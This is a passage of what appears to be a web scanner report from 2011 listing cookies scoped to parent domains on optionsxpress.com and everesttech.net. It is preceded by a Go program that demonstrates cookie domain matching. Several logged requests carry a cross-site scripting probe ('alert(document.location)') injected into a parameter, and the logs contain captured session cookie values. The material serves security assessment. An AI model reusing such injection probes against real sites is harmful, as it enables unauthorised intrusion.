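The scope rule described above can be checked with Go's standard cookie jar, which implements the RFC 6265 domain matching browsers apply. The program below is an added example, not from the report or from everesttech.net: it replays the domain-scoped everest_session_v2 cookie from 9.1 next to a hypothetical host-only replacement, then asks the jar which cookies it would attach to requests for the issuing host, a sibling subdomain, the parent domain, and an unrelated site. The hardened cookie name and the target hosts other than pixel.everesttech.net are constructed, and the issuing URL is taken as https so the hardened cookie's Secure flag is honoured.

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/cookiejar"
	"net/url"
	"sort"
)

// cookiesSentTo replays a Set-Cookie exchange through Go's RFC 6265 cookie jar:
// the server at issuer sends setCookies, and the function returns the names of
// the cookies the jar would attach to a later request for target.
func cookiesSentTo(issuer string, setCookies []string, target string) ([]string, error) {
	jar, err := cookiejar.New(nil) // nil options: no public-suffix list, enough for this demo
	if err != nil {
		return nil, err
	}
	issuerURL, err := url.Parse(issuer)
	if err != nil {
		return nil, err
	}
	targetURL, err := url.Parse(target)
	if err != nil {
		return nil, err
	}
	// Parse the raw header values exactly as an http.Client would.
	resp := &http.Response{Header: http.Header{}}
	for _, sc := range setCookies {
		resp.Header.Add("Set-Cookie", sc)
	}
	jar.SetCookies(issuerURL, resp.Cookies())

	names := []string{}
	for _, c := range jar.Cookies(targetURL) {
		names = append(names, c.Name)
	}
	sort.Strings(names)
	return names, nil
}

// demoIssuer is the URL that set the cookies in the 9.1 response (scheme changed to https).
const demoIssuer = "https://pixel.everesttech.net/2164/cq"

// demoSetCookies are constructed Set-Cookie values: the first copies the
// domain-scoped cookie from the 9.1 response; the second is a hypothetical
// hardened replacement with no Domain attribute (host-only) plus Secure and HttpOnly.
var demoSetCookies = []string{
	"everest_session_v2=CeBOaRZ1-iwAAIdj; path=/; domain=.everesttech.net",
	"hardened_session=CeBOaRZ1-iwAAIdj; path=/; Secure; HttpOnly",
}

func main() {
	for _, target := range []string{
		"https://pixel.everesttech.net/", // the issuing host
		"https://www.everesttech.net/",   // a sibling subdomain
		"https://everesttech.net/",       // the parent domain itself
		"https://pixel.example.net/",     // an unrelated site
	} {
		names, err := cookiesSentTo(demoIssuer, demoSetCookies, target)
		if err != nil {
			panic(err)
		}
		fmt.Printf("%-32s -> %v\n", target, names)
	}
}
```

The domain-scoped cookie is returned for every host under everesttech.net, which is exactly the exposure the issue describes; the cookie set without a Domain attribute comes back only for pixel.everesttech.net. The jar here is built without a public-suffix list, so unlike a browser it would also accept a cookie scoped to a public suffix such as .co.uk; pass a publicsuffix list to cookiejar.New if that distinction matters.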


9.1. http://pixel.everesttech.net/2164/cq

Summary

Severity:   Low
Confidence:   Firm
Host:   http://pixel.everesttech.net
Path:   /2164/cq

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: everest_session_v2 and everest_g_v2, both set with domain=.everesttech.net. One of them appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2164/cq?ev_sid=3&ev_ln=futures%20options&ev_crx=7551788913&ev_mt=b&ev_n=g&ev_ltx=&ev_pl=&url=http%3A//www.optionsxpress.com/promos/experience_an_options_specialist.aspx%3Fintcmp%3Dlp_sales_futures%26cmpid%3Dgsus23305007 HTTP/1.1
Host: pixel.everesttech.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=futures+trading
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR

Response

HTTP/1.1 302 Found
Date: Thu, 08 Sep 2011 19:24:37 GMT
Server: Apache
Set-Cookie: everest_session_v2=CeBOaRZ1-iwAAIdj; path=/; domain=.everesttech.net
Set-Cookie: everest_g_v2=g_surferid~zqROZUBXyFQAAIdR; path=/; domain=.everesttech.net; expires=Fri, 13-Sep-2030 06:04:37 GMT
P3P: CP="NOI NID DEVa PSAa PSDa OUR IND PUR COM NAV INT DEM"
Cache-Control: no-cache
Location: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
Content-Length: 348
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.optionsxpress.com/promos/experience_
...[SNIP]...

9.2. https://account.optionsxpress.com/OpenAccount/Index

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Index

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OpenAccount/Index?intcmp=lp_sales_futures&firm=OX HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: http://www.optionsxpress.com/promos/experience_an_options_specialist.aspx?intcmp=lp_sales_futures&cmpid=gsus23305007&ef_id=zqROZUBXyFQAAIdR:20110908192437:s
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; TLTHID=7168044948469A60359581B20B826924

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 86733
Content-Type: text/html; charset=utf-8
Expires: Thu, 08 Sep 2011 19:25:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=8BDB9C054DE94B794A725090608A94A2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:20 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   

</title><link rel="sty
...[SNIP]...

9.3. https://account.optionsxpress.com/OpenAccount/NewAccountAjax/GenericHandler

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/NewAccountAjax/GenericHandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /OpenAccount/NewAccountAjax/GenericHandler?methodName=GetFirmFromCountry&parameters=1 HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 4
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-AspNetMvc-Version: 1.0
Set-Cookie: TLTHID=DAA835CC43F5D88C7C759C8916AE73EE; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

"OX"

9.4. https://account.optionsxpress.com/OpenAccount/Scripts/nap.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/nap.css

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/nap.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 8210
Content-Type: text/css
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/nap.css
Last-Modified: Tue, 24 May 2011 16:44:37 GMT
Accept-Ranges: bytes
ETag: "80482bde311acc1:efb"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CB5EB094D57EFBDD7F02D873075B0F6; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=0CB5EB094D57EFBDD7F02D873075B0F6; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

*
{
margin: 0;
padding: 0; /*font:bold 12px "Lucida Grande", Arial, sans-serif; */
}

#columnContainerTwo,
#openAccount
...[SNIP]...

9.5. https://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/napgeneral.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/napgeneral.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 69748
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/napgeneral.js
Last-Modified: Tue, 10 May 2011 16:55:21 GMT
Accept-Ranges: bytes
ETag: "80623dc33fcc1:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=763E378F444B9764FB516DBF60432013; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=763E378F444B9764FB516DBF60432013; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

9.6. https://account.optionsxpress.com/OpenAccount/Scripts/naponload.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/naponload.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/naponload.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 12001
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/naponload.js
Last-Modified: Tue, 23 Nov 2010 14:53:52 GMT
Accept-Ranges: bytes
ETag: "040423e1e8bcb1:fc8"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E9AF2F6144A0120B1C2E90B8BF0628B1; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=E9AF2F6144A0120B1C2E90B8BF0628B1; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

9.7. https://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /OpenAccount/Scripts/napvalidate.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /OpenAccount/Scripts/napvalidate.js HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 154727
Content-Type: application/x-javascript
Content-Location: http://account.optionsxpress.com/OpenAccount/Scripts/napvalidate.js
Last-Modified: Thu, 07 Apr 2011 17:11:23 GMT
Accept-Ranges: bytes
ETag: "802f1d246f5cb1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4489136141A3C546F157268319DC82E2; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=4489136141A3C546F157268319DC82E2; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:28 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

/*******************************************************************************************************************
   SB 08/12/2010
******************************************************************
...[SNIP]...

9.8. https://account.optionsxpress.com/css/oxps.css

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /css/oxps.css

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /css/oxps.css HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 66752
Content-Type: text/css
Last-Modified: Mon, 10 May 2010 20:56:05 GMT
Accept-Ranges: bytes
ETag: "b095c23483f0ca1:eba"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4DCE15C74DC6FFB53C82A6AF748A4ACA; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=4DCE15C74DC6FFB53C82A6AF748A4ACA; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:29 GMT
Vary: Accept-Encoding
Connection: Keep-Alive

@import url("https://images.optionsxpress.com/css/reset.css");

html,body {
   background: #ffffff;
   background-image: url("https://images.optionsxpress.com/images/prelogin/ox_bg.jpg");
   margin: 0p
...[SNIP]...

9.9. https://account.optionsxpress.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; Firm=OX; TLTHID=61F93426422DA13562D689B5022DBFC6

Response

HTTP/1.1 200 OK
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Fri, 20 Mar 2009 15:16:36 GMT
Accept-Ranges: bytes
ETag: "062bdc6ea9c91:fb9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=F04D32D8484F69A30C544985DCE10F86; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:31 GMT

...[SNIP]...

9.10. https://account.optionsxpress.com/images/btn_next_step.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/btn_next_step.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/btn_next_step.jpg HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 2414
Content-Type: image/jpeg
Last-Modified: Wed, 05 Nov 2008 18:29:43 GMT
Accept-Ranges: bytes
ETag: "805ab78743fc91:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A8232ADF480D39289D31E09763CACF10; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:27 GMT

...[SNIP]...

9.11. https://account.optionsxpress.com/images/icon_arrow.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/icon_arrow.jpg

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icon_arrow.jpg HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 449
Content-Type: image/jpeg
Last-Modified: Thu, 10 Jul 2008 18:51:58 GMT
Accept-Ranges: bytes
ETag: "6027ab7bee2c81:ef3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=40AC7ADE4E4FC6801AC62196A778AB08; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=40AC7ADE4E4FC6801AC62196A778AB08; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

...[SNIP]...

9.12. https://account.optionsxpress.com/images/icons/log_in.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/icons/log_in.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icons/log_in.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 1929
Content-Type: image/gif
Last-Modified: Thu, 06 Nov 2008 19:47:15 GMT
Accept-Ranges: bytes
ETag: "80a3e3774840c91:e6d"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=21EAC738463348E4E7697498E4FA20F5; Path=/; Domain=.optionsxpress.com
Set-Cookie: TLTSID=21EAC738463348E4E7697498E4FA20F5; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:30 GMT

...[SNIP]...

9.13. https://account.optionsxpress.com/images/logos/firm/newlogo_ox.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/logos/firm/newlogo_ox.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logos/firm/newlogo_ox.gif HTTP/1.1
Host: account.optionsxpress.com
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=AF390C804BE14C3A1579AEAAAD65A123; mbox=check#true#1315527980|session#1315527919598-875378#1315529780|PC#1315527919598-875378.19#1316737521; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|27348B3F85159F3A-600001768000142C[CE]; s_ev23=%5B%5B%27gsus23305007%27%2C%271315527951277%27%5D%5D; s_campaign=gsus23305007; Firm=OX; TLTHID=6BF746C24651B1BAD934E8B86A795596; INTCMP=lp_sales_futures; s_pers=%20gpv_pn%3DOpenAccountprop5Index%7C1315529764039%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Content-Length: 3698
Content-Type: image/gif
Last-Modified: Thu, 01 Sep 2011 04:00:28 GMT
Accept-Ranges: bytes
ETag: "1f1382af5b68cc1:e65"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A07AAAC644F53C5E640E80A0791B83B0; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:25:26 GMT

...[SNIP]...

9.14. https://account.optionsxpress.com/images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/logos/firm/newlogo_oxb5a37alert(document.location)//18aaa9ddc45.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 15335
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Firm=OX; expires=Fri, 09-Sep-2011 07:33:31 GMT; path=/
Set-Cookie: TLTHID=67AC9231459F78416C6C118417F2EB5D; Path=/; Domain=.optionsxpress.com
Date: Thu, 08 Sep 2011 19:33:31 GMT
Vary: Accept-Encoding
Connection: Keep-Alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <titl
...[SNIP]...

9.15. https://account.optionsxpress.com/images/minus_new_acct.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   https://account.optionsxpress.com
Path:   /images/minus_new_acct.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/minus_new_acct.gif HTTP/1.1
Host: account.optionsxpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://account.optionsxpress.com/OpenAccount/Index?intcmp=lp_sales_futures&firm=OXb5a37%0aalert(document.location)//18aaa9ddc45
Cookie: TLTHID=0CB03A254689E5598130BFBF7D2A396D

Response

HTTP/1.1 200 OK
Content-Length: 176
Content-Type: image/gif
Last-Modified: Mon, 20 Jun 2005 14:21:32 GMT
Accept-Ranges: bytes
ETag: "60a375ba375c51:fc8"
Server: Microsoft-IIS/6.0
